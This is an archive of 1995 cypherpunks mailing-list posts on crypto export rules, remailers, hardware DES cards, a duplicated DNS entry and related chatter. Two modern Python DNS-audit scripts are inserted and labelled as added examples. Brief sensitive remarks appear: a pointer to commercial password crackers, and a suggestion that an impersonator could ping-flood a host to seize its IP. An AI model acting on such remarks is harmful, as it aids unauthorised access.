Message-ID: <v02120d06ac4c6bfa9939@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I read in a speech by Rutkowski that the latest Internet growth stats are
published twice a month. I searched at the Internet Society site, and other
usual suspects, but to no avail. URL, anyone?

TIA,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 7 Aug 95 17:49:18 PDT
To: cypherpunks@toad.com
Subject: hardware encryption
Message-ID: <v02120d10ac4c71ff42bd@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I'm looking for add-in cards that implement DES and/or RSA
for either a PC (ISA/EISA/whatever) or a Sun (S-Bus),
preferably a Sun. Also, the RSA card would need to implement
a 1024 bit modulus.

Any tips or pointers? I've got the list of chip makers in
_Applied Cryptography_, but the ones I've contacted so far
don't seem to know anything about cards, even if they admit
that they have the chips.

Thanks,

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dorab Patel <dorab@twinsun.com>
Date: Mon, 7 Aug 95 18:14:38 PDT
To: shamrock@netcom.com
Subject: Re: Where to find Internet growth stats?
In-Reply-To: <v02120d06ac4c6bfa9939@[192.0.2.1]>
Message-ID: <199508080113.SAA00900@knee.twinsun.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.isoc.org/

also

gopher://akasha.ti.com:70/11/matrix/growth/internet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 7 Aug 95 16:09:46 PDT
To: cypherpunks@toad.com
Subject: Two-faced Security Problem? Dammit Janus?
Message-ID: <ac4c4b91000210041ba1@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Not exactly crypto, but the same idea:

I've been trying to hook up an HTTP server sitting on a Mac at the end of
my normal PPP connection. This was just supposed to be a test, but I kept
getting annoying connection problems whenever someone tried to GET a page
from me. The connection wouldn't go through about half of the time.

After poking around for a week, I discovered that my home machine,
newray.digex.net, is listed in Digex's nameservers TWICE! Once with the
IP address that my home machine is waiting for (199.125.128.5) and once
with some other IP address in the digex space (164.109.211.61). If you do
an nslookup on the name, you get both addresses. I believe that the
technically correct thing for someone to do is to choose one of the
addresses at random to distribute the load between two machines pretending
to be one. This explains the connection failures that happened half of the
time.

This has led me to wonder, though, whether this is some sort of security
breach. For instance, could there be someone out there masquerading as me?
Normally I run Eudora, Netscape, Telnet and other outward bound
applications. It was almost a fluke that I noticed that there were two
entries.

Does some software need to find its IP address in a DNS table? For
instance, does Eudora need to look up  164.109.211.61 to find
"newray.digex.net"? If someone was using this software on the masquerading
node, they would need to set up an entry in the tables to make everything
work. They just assumed I would never get inbound traffic.

Any theories on this?

-Peter "More Paranoid Than Ever" Wayner
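
An added example, not part of the original post: a zone-data check for the situation described above, where one name carries two A records and only one of them belongs to the host. The PTR records, the other.digex.net entry and the function names are constructed for illustration; only newray.digex.net and its two addresses come from the message.

```python
from collections import defaultdict
import ipaddress

# Constructed sample in zone-file style. The two A records for
# newray.digex.net are the ones quoted in the message; every PTR record and
# the "other" host are made up so the audit has something to cross-check.
SAMPLE_RECORDS = """
newray.digex.net.            IN A    199.125.128.5
newray.digex.net.            IN A    164.109.211.61
other.digex.net.             IN A    164.109.211.62
5.128.125.199.in-addr.arpa.  IN PTR  newray.digex.net.
61.211.109.164.in-addr.arpa. IN PTR  newray.digex.net.
62.211.109.164.in-addr.arpa. IN PTR  other.digex.net.
"""

# What the operator knows to be true: the addresses each host really answers on.
LIVE = {"newray.digex.net": {"199.125.128.5"}}


def parse_records(text):
    """Return (forward, reverse): name -> [addresses] and address -> [names]."""
    forward, reverse = defaultdict(list), defaultdict(list)
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop zone-file comments
        if not line:
            continue
        fields = line.split()
        if len(fields) != 4 or fields[1].upper() != "IN":
            raise ValueError("unsupported record: %r" % raw)
        owner, _, rtype, rdata = fields
        owner = owner.lower().rstrip(".")
        rtype = rtype.upper()
        if rtype == "A":
            forward[owner].append(str(ipaddress.IPv4Address(rdata)))
        elif rtype == "PTR":
            labels = owner.split(".")
            if len(labels) != 6 or labels[-2:] != ["in-addr", "arpa"]:
                raise ValueError("not an IPv4 reverse name: %r" % owner)
            # in-addr.arpa names carry the octets in reverse order
            addr = str(ipaddress.IPv4Address(".".join(reversed(labels[:4]))))
            reverse[addr].append(rdata.lower().rstrip("."))
        else:
            raise ValueError("unsupported record type: %r" % rtype)
    return dict(forward), dict(reverse)


def audit(forward, reverse, live):
    """Report names with several A records, flagging addresses the host does not own.

    expected_failure_rate assumes a client picks uniformly among the A
    records, which is the behaviour the message describes.
    """
    findings = []
    for name, addrs in sorted(forward.items()):
        if len(addrs) < 2:
            continue
        owned = live.get(name, set())
        unexpected = [a for a in addrs if a not in owned]
        findings.append({
            "name": name,
            "addresses": addrs,
            "unexpected": unexpected,
            "expected_failure_rate": len(unexpected) / len(addrs),
            # A PTR that points back at the name means the reverse zone was
            # also populated for the unexpected address, not just the forward one.
            "ptr_claims": {a: reverse.get(a, []) for a in unexpected},
        })
    return findings


if __name__ == "__main__":
    fwd, rev = parse_records(SAMPLE_RECORDS)
    for finding in audit(fwd, rev, LIVE):
        print(finding)
```

A PTR record pointing the unexpected address back at the same name shows that both zones were edited, which is the question to take to whoever administers them.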






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Mon, 7 Aug 95 16:27:13 PDT
To: cypherpunks@toad.com
Subject: patent info URL
Message-ID: <v02120d06ac4c5f187191@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


Since various intellectual property debates and questions come up
("plague") periodically, it seemed like it'd be a good idea to post the
following URL:

        http://www.patents.com/

It's run by a small patent law firm and has a series of well-linked, snappy
FAQs on issues pertaining to intellectual property, patents (including some
on "I had a really clever idea--what should[n't] I do?"), relevant links,
etc. etc

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Mon, 7 Aug 95 19:05:21 PDT
To: cypherpunks@toad.com
Subject: See y'all in a while....
Message-ID: <199508080200.AA08748@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain




I'm leaving the list for a while while I try to work out a different
way of accessing the net. In short, I've grown dissatisfied with my
ISP and need some time to think things through before making other
arrangements. It's too frustrating sorting through all of this mail
without proper filtering scripts like I had set up back at srl03.

And news is kind-of beside the point: the news server is always
full, and rejects any attempt to post because of lack of space.

In the meantime, while y'all discuss all that stuff about logical
proofs and the like, please, _please_, stay away from crosswalks?

I'll probably make another attempt at downloading pgp262s.zip before
I shut this down... the first two times the modem (I think theirs)
went flaky and dropped the connection on me.

Okay. time to see if the signature service works. Later, dudes.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBwQDCoTheIowlstareqnot8whaththeyEseemMI5rculIym8xjzYV8C
mErjcooperUcoopermcooperqBviplMp
=aBGi
-----END PGP SIGNATURE-----

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 18:39:44 PDT
To: cypherpunks@toad.com
Subject: 700_dig
Message-ID: <199508080139.VAA01367@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   MH has provided a transcript of Pat Robertson's show on
   digital cash of March 8, 1995. It includes remarks by David
   Chaum, Dave Banisar, Steven Levy and others.


   700_dig (about 14K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 18:41:46 PDT
To: cypherpunks@toad.com
Subject: WDM_zum
Message-ID: <199508080141.VAA01570@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   RH has provided an informative article on wavelength
   division multiplexing (WDM) from the August 7 InfoWorld:

   "Boost in optical-fiber communication capacity is just over
   the rainbow," by Bob Metcalfe, the founder of 3Com.


   WDM_zum (about 5K)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dochobbs@wwa.com (Michael D. Hobbs)
Date: Mon, 7 Aug 95 19:50:49 PDT
To: Matt Miszewski <sunder@escape.com>
Subject: Re: MS Money password problem
Message-ID: <m0sfek8-000FUrC@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not sure if this has been mentioned or will help, but this
company makes crackers for quicken, word and wordperfect (not
sure about M$ money though).

http://gn2.getnet.com:80/crak/
email: johnk@indirect.com
_____________________________________________________________
dochobbs@wwa.com	M.D. Hobbs	mhobbs@rad.rpslmc.edu
http://miso.wwa.com/~dochobbs		finger for my pgp key
I am human and nothing human do I count alien.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brendan@Mail.RAth.PeachNet.EDU (Brendan Mullen)
Date: Mon, 7 Aug 95 20:30:53 PDT
To: cypherpunks@toad.com
Subject: Re: Where to find Internet growth stats?
Message-ID: <v02130501ac4c8965a56e@[168.24.241.128]>
MIME-Version: 1.0
Content-Type: text/plain


http://www.tic.com/mids/midshome.html
is  --cut->>Matrix Information and Directory Services, Inc. (MIDS) is a
corporation founded by

      Smoot Carl-Mitchell
      and John S. Quarterman.
      Eric McKinney is Assistant Editor.  <<--paste-


---
Brendan Mullen  brendan@chugalug.cosmic.uga.edu
Athens GA USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 20:12:42 PDT
To: cypherpunks@toad.com
Subject: RSA Catalog
Message-ID: <199508080312.XAA14393@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For those who've not yet fondled RSA's sleek "Security 
Solutions Catalog," it can be virtually diddled at:


http://www.rsa.com/rsa/sscatw95/P67.HTM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 7 Aug 95 20:28:55 PDT
To: Goh Seow Hiong <shgoh@ncb.gov.sg>
Subject: Re: Triple-DES controlled?
In-Reply-To: <Pine.3.89.9508080916.G1185-0100000@gallery.ncb.gov.sg>
Message-ID: <199508080328.XAA24362@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Goh Seow Hiong writes:
> Could someone confirm whether the US export restrictions apply to 
> Triple-DES?

Yes.

> If so, are there exceptions as in the case of DES (e.g. for 
> banking or financial applications).

I have not heard of export licenses being granted for 3DES.

However, why do you care? As a person from a reasonably free country
you can just get the DES code from Finland or any one of dozens of
other sites outside the US.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 7 Aug 95 21:03:16 PDT
To: perry@piermont.com
Subject: Re: Triple-DES controlled?
Message-ID: <9508080402.AA02918@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I have not heard of export licenses being granted for 3DES.

Didn't the ANSI financial committee just adopt 3DES (over NSA
objections)?  Presumably they consider the export situation solved/solvable.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Mon, 7 Aug 95 21:09:14 PDT
To: dochobbs@wwa.com
Subject: Re: www remailer interface
Message-ID: <199508080404.AAA02398@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



> 1. removing the hardwired

> 2. removing the hardwired and forcing you to chain

> 3. keep the hardwired in and use some 'established' remailer
> or one the group can come to a consensus on.

  Given the second possibility, I see no reason to hardwire a
remailer.  It really will make people suspicious!  I can easily
imagine someone deciding not to use that remailer again, just
on general principles.

  And anyway, chaining is not always necessary, especially if
the sender is at a public Web terminal or using an anonymous Web
proxy.  The remailers don't enforce chaining, why should you?


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 7 Aug 95 21:07:22 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Triple-DES controlled?
In-Reply-To: <9508080402.AA02918@sulphur.osf.org>
Message-ID: <199508080407.AAA09263@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> >I have not heard of export licenses being granted for 3DES.
> 
> Didn't the ANSI financial committee just adopt 3DES (over NSA
> objections)?

Yes.

> Presumably they consider the export situation solved/solvable.

There is the trivial solution of buying outside the US. The hardware
is actually better these days as the Germans and others have a
worldwide market and the economies that brings.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 8 Aug 95 00:37:08 PDT
To: perry@piermont.com
Subject: Re: Triple-DES controlled?
Message-ID: <199508080734.AAA17572@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Didn't the ANSI financial committee just adopt 3DES (over NSA
>> objections)?
>> Presumably they consider the export situation solved/solvable.

>There is the trivial solution of buying outside the US. The hardware
>is actually better these days as the Germans and others have a
>worldwide market and the economies that brings.

Also, the ITAR rules give banks and financial institutions Extra Slack for
exporting crypto gear for their own use.  In some ways that makes sense
(electronic bank robbery could be a very profitable business, and bankers are
politically influential), and yet some of the government's biggest objections
to free crypto seem to be that it allows people to have financial privacy...
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Mon, 7 Aug 95 16:32:27 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: MS Money password problem
In-Reply-To: <Pine.BSD/.3.91.950807160839.11218R-100000@escape.com>
Message-ID: <Pine.3.89.9508080050.C19886-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Aug 1995, Ray Arachelian wrote:

> Welp, good luck to you.  Of course, this should be a great huge reminder 
> of why BACKUPS are important.  If you have a backup of the data >BEFORE< 
> she locked it, you only lost anything entered from between the date of 
> the backup and "today."

Nope.  The backups are just as protected.  Granted I doubt it is anything 
but trivial, but I do have a regular job and every hour I spend getting 
this password is a billable hour gone...

> =================================================================93=======
>  + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
>   \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
> <--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
>   /|\  |    Just Say     |                                 |----\  /---- | 
>  + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
> =======/---------------------------------------------------------VI------/

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 7 Aug 95 22:49:11 PDT
To: hallam@w3.org
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <9508071521.AA10100@zorch.w3.org>
Message-ID: <Pine.3.89.9508080041.F11342-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 7 Aug 1995 hallam@w3.org wrote:

> 
> The requirement for "proving" a program is thus significantly less onerous than 
> asserted. It is not necessary to provide a transcendental proof, merely to 
> establish consistency with respect to a commonly accepted set of axioms.
> 
> 
> 	Phill Hallam-Baker
> 

Is THAT all?  But I didn't know we could establish consistency of these 
commonly accepted axioms with THEMSELVES!  (By commonly accepted, I mean 
ZF.  I'll even the choice & continuum hypotheses out.)

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 7 Aug 95 22:00:13 PDT
To: cypherpunks@toad.com
Subject: [Meaningless] Vote.
Message-ID: <199508080457.AAA03322@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Fellow Cypherpunks:

Below is the URL of an "Online Forum" page to allow 
'Net citizens to vote on various, (usually boring) issues.

>**************************************************
>    VOTELINK brings the Voice of the Internet
> To today's hot news topics. To make your voice 
>       "heard round the world" go to:
>
>           http://www.votelink.com 
>***************************************************

So last week I was surfin', wastin' time, and drinkin'
a brew, and I happened by. I was asked to vote on some
mundane topic [I forget what]--and instead I suggested
a "World Vote" topic I liked better, and, sure enough,
they put it up this week: [I was shocked when they e-
mailed me!]
:-)

>Should Phil Zimmermann be prosecuted for allowing
>     release of his PGP encryption program on the
>                   Internet? 
>                                                                           
>
>  PRO: ITAR export restrictions exist.
>  Cryptographic software, like PGP, is
>  considered a weapon of war. -- more
[somebody shoot me with PGP, and nothing else!]
>
>  CON: Imprisoning Zimmermann for export
>  violations would be an unconstitutional restraint of
>  free speech and privacy rights. -- more
[guess how Jim Ray voted...] ;-)

       OK. Far be it from me to suggest vote fraud
[there aren't too many Libertarians in cemeteries
anyway :)] but I think certain cypherpunks might
want to go "vote" this week, if you have the time
to waste.

Please vote *only* once, and tell all your buddies.
Thanks.
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCbswG1lp8bpvW01AQGDeAP8DZiWwIsABi7sy3MuyZo5QMFB/lf0ghIg
8zcE/WGaPocvwqlxwBW3DckSQw/vM8cqyv3LGPjQwC2il5HpELdyS44Rd4tQ/Qjb
p0P+6mZh0Qk8domUuadX877Lk8hcnh7ydypCL3WPigSvh3tYYGwnL00Q6vi6nKzj
YQ7092OOn80=
=ebKB
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCbtzyoZzwIn1bdtAQHUowGA1pSgF1+AVBDi0Jz8H7dd4XIvbXNulPvF
SIRzwHrNMApJoz2mX34r+8hndI3nwREW
=hz/N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Mon, 7 Aug 95 22:59:33 PDT
To: cypherpunks@toad.com
Subject: Parental Advisory
Message-ID: <199508080603.BAA08535@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Just wanted to let folks know that I'm able to confirm that He is still
monitoring the list. Got a response to my posting about my Web page :-/

I hope others will stop by and check it out - links to it welcome.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Tue, 8 Aug 95 07:35:54 PDT
To: cypherpunks@toad.com
Subject: Announce: Private Idaho 2.5 beta
Message-ID: <199508081435.HAA14596@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The 2.5 beta version of Private Idaho is now available from:

http://www.eskimo.com/~joelm

or

ftp.eskimo.com /u/j/joelm/pidho25b.zip

After I'm satisfied it is relatively bug free, it will be announced to the appropriate newsgroups and placed on mirror sites.

Significant enhancements include:

   send SMTP mail directly from Private Idaho
   attach sigs
   conventional PGP encryption option
   anonymous USENET posting through supporting remailers
   improved multi-key interface

The final release will also have full Windows-style help as well as an automated installation program.

This is my first venture into writing TCP/IP - Windows Sockets code.  The SMTP routines seem to work with my ISP, but we'll see what happens on other mail servers.  Coming attractions - once I determine the TCP/IP code is stable, I plan on implementing POP3 background checking for PGP messages.

As usual, comments, questions, and bugs to:

joelm@eskimo.com

----------------------
Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Tue, 8 Aug 95 08:13:14 PDT
To: cypherpunks@toad.com
Subject: Announce: Private Idaho 2.5 beta (addendum)
Message-ID: <199508081513.IAA21067@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, up all night coding, and forgot to briefly describe what Private Idaho is:

Private Idaho is a freeware, Windows frontend to PGP and the anonymous remailers.  It provides a simple, easy to use interface for encrypting and decrypting messages as well as preparing messages to send through remailers.  Although quite usable by crypto-novices, there are a number of advanced features for more experienced users.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Brenton" <Chris.Brenton@newsedge.com>
Date: Tue, 8 Aug 95 05:34:34 PDT
To: <cypherpunks@toad.com>
Subject: Re: Two-faced Security Problem? Dammit Janus?
Message-ID: <9508080837.AA16436@herne.newsedge.com>
MIME-Version: 1.0
Content-Type: text/plain


In reply to:
>
>
>After poking around for a week, I discovered that my home machine,
>newray.digex.net, is listed in the Digex's nameservers TWICE! Once with the
>IP address that my home machine is waiting for (199.125.128.5) and once
>with some other IP address in the digex space (164.109.211.61). If you do an
>nslookup on the name, you get both addresses. I believe that the
>technically correct thing for someone to do is to choose one of the
>addresses at random to distribute the load between two machines pretending to
>be one. This explains the connection failures that happened half of the
>time.
>
>This has led me to wonder, though, whether this is some sort of security
>breach. For instance, could there be someone out there masquerading as me?
>Normally I run Eudora, Netscape, Telnet and other outward bound
>applications. It was almost a fluke that I noticed that there were two
>entries.
>

More likely this is a matter of someone assigning a host name to a system
without realizing it has already been taken. Yes it can be a security breach but
as you experienced the connection is broken easily. If someone wanted to grab
your identity they would more likely busy your system (by flooding you with ping
requests or something similar) and then grab your IP address.

>Does some software need to find its IP address in a DNS table? For
>instance, does Eudora need to look up  164.109.211.61 to find
>"newray.digex.net"? 

The lookup typically goes the other way around, from host--->IP address.
Depending on the cache hits either address could be returned.
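
[Added example, not part of the original posts: a small offline audit of the
situation described in this exchange, one host name carrying two A records.
The host name and the two addresses are taken from the post; the PTR records
and the name "other-host.example" are constructed assumptions for illustration.]

```python
from collections import defaultdict
import ipaddress

# Constructed sample zone data. Only newray.digex.net and its two addresses
# come from the post; the PTR records and other-host.example are hypothetical.
RECORDS = [
    ("newray.digex.net.", "A", "199.125.128.5"),
    ("newray.digex.net.", "A", "164.109.211.61"),
    ("5.128.125.199.in-addr.arpa.", "PTR", "newray.digex.net."),
    ("61.211.109.164.in-addr.arpa.", "PTR", "other-host.example."),
    ("other-host.example.", "A", "164.109.211.61"),
]


def index(records):
    """Split records into forward (name -> addresses) and reverse (PTR) maps."""
    forward = defaultdict(list)
    reverse = defaultdict(list)
    for owner, rtype, value in records:
        owner = owner.lower().rstrip(".")
        value = value.lower().rstrip(".")
        if rtype == "A":
            forward[owner].append(value)
        elif rtype == "PTR":
            reverse[owner].append(value)
    return forward, reverse


def ptr_names(reverse, address):
    """Names that the reverse zone claims for this address."""
    key = ipaddress.ip_address(address).reverse_pointer
    return reverse.get(key, [])


def audit(records, host, expected_address):
    """Return findings for one host whose legitimate address is known."""
    forward, reverse = index(records)
    host = host.lower().rstrip(".")
    findings = []
    addresses = forward.get(host, [])

    # Two A records mean a resolver may hand out either address.
    if len(addresses) > 1:
        findings.append(("multiple-A", host, tuple(sorted(addresses))))

    for addr in addresses:
        # An address the owner does not recognise is the one to investigate.
        if addr != expected_address:
            findings.append(("unexpected-address", host, addr))
        # Forward-confirmed reverse DNS: the PTR should name the same host.
        names = ptr_names(reverse, addr)
        if host not in names:
            findings.append(("ptr-mismatch", addr, tuple(names)))
        # The same address listed under another name suggests a reused
        # or mistakenly assigned host name rather than load sharing.
        sharers = sorted(
            name for name, addrs in forward.items()
            if addr in addrs and name != host
        )
        if sharers:
            findings.append(("address-shared", addr, tuple(sharers)))
    return findings


if __name__ == "__main__":
    for finding in audit(RECORDS, "newray.digex.net", "199.125.128.5"):
        print(finding)
```
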






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 8 Aug 95 05:48:32 PDT
To: cypherpunks@toad.com
Subject: proving programs correct
Message-ID: <199508081248.IAA11447@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



A boss of mine at Bellcore, and a very smart guy (B. Gopinath) once
mentioned to me that (with the exception of scheme) he'd never seen a
set of formal semantics for a language that were smaller than the
largest program one would care to write in the language. He was, of
course, slightly exaggerating for effect, but his point was very
simple: you can't even get the basis on which to write your proofs
right.

An interesting experience happened during the same project, as I
recall: we attempted to prove a small bit of code correct.
Unfortunately, the proof had a bug in it which meshed nicely with a
bug in the program and a bug in the implementation. Proofs are no less
large complicated formal constructs than programs are, and checking
them is no less onerous, unless they are written in formal logic in
which case they are not possible for human beings to produce.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 8 Aug 95 01:35:46 PDT
To: jschultz@coins0.coin.missouri.edu (John Schultz)
Subject: Re: RSA/Perl Shirts
Message-ID: <10803.9508080834@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



John Schultz <jschultz@coins0.coin.missouri.edu> writes on cpunks:
> On Mon, 7 Aug 1995, Rev. Ben wrote:
> > Has Joel Furr shipped his shirts yet?
> > 
> > I see some people on the list have gotten shirts and i was wondering as 
> > I still have not gotten mine.
> 
> I was wondering the same thing myself.  I know my check was cashed over a 
> month ago, but no shirt has arrived.

There are 2 (well 4 actually) suppliers of shirts:

1) (US/Canada) Joel Furr at Josh Osborne's instigation (no current offer,
   but still to send out shirts from first batch)  OFFER PASSED

2) (free world :-) Me - Adam Back <aba@dcs.ex.ac.uk>
   http://dcs.ex.ac.uk/~aba/rsa UK printing cost only - still taking orders
   1st batch will be ordered RSN

3) (US/Canada) Don Henson <dhenson@itsnet.com> http://colossus.net/wepinsto/
   25% of proceeds to Phil Z legal defense fund - 1st batch shipped, taking
   orders next batch

4) (AU region of free world) Lucy Chubb <lucyc@suite.sw.oz.au>
   (no WWW URL yet) will soon be printing some in Australia cost only also
   send her email for status, starting soon

The last I heard about the status of Joel's shirts was on the netstuff
mailing list, some time ago, he said there had been delays due to
various reasons, and that his shirts wouldn't be ready until end July.
As July has ended, I'm presuming this will be RSN.

The people who have their shirts are those who ordered through Don
Henson, who has proceeded very quickly to ship shirts, he was the
start of the 350 ordered thread.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Goh Seow Hiong <shgoh@ncb.gov.sg>
Date: Mon, 7 Aug 95 18:39:13 PDT
To: cypherpunks@toad.com
Subject: Triple-DES controlled?
Message-ID: <Pine.3.89.9508080916.G1185-0100000@gallery.ncb.gov.sg>
MIME-Version: 1.0
Content-Type: text/plain



Could someone confirm whether the US export restrictions apply to 
Triple-DES?  If so, are there exceptions as in the case of DES (e.g. for 
banking or financial applications).

Thx.


SH




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 8 Aug 95 07:04:43 PDT
To: tcmay@go.net (Timothy C. May)
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <199508081404.KAA15440@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 8/2/95 -0700, Timothy C. May wrote:

>So, hearing that "Pat Robertson is warning against a digital cash society"
>is not too worrisome to me. I suspect he means the stuff about Big Brother
>tracking us and the Number of the Beast, and so on.

Correct.  I have in my hot little hands a book called "Racing Toward the
Mark of the Beast -- Your Money, Computers, and the End of the World" by
Peter & Paul Lalonde (hosts of "This Week in Bible Prophecy") published by
Harvest House.  

They relate the story of their attendance at 1993's "Solutions for the
Global Frontier" card technology conference in Washington, DC which happened
